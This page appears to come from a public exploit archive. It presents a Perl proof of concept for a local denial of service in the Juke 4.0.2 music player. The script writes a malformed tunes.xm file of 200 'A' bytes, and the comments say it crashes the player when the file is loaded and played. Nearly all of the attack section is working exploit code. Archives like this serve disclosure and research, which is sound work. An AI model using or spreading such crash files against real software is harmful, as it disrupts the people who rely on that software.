Juke 4.0.2 local denial of service

2010.04.08
Credit: chap0
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: Juke 4.0.2 DoS Multiple Files # Date: April 6, 2010 # Software Link: [http://www.wolosoft.com/en/download.html] # Version: 4.0.2 # Tested on: Windows XP SP3 # Author: chap0 # Email: chap0x90 gmail com # # Juke will Crash when you run this script to make # a file with any of the following extensions # .xm .nst .s3m .stm .mod # # Usage: Run Script -> Add file with + -> Press Play #!/usr/bin/perl my $music = "tunes.xm"; my $mic = "\x41" x 200; print "Creating File . . .\n"; sleep(1); open (FILE, ">$music"); print FILE "$mic"; close FILE; print "\nIt's a mix between Jazz and Funk, it's called Junk!";


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top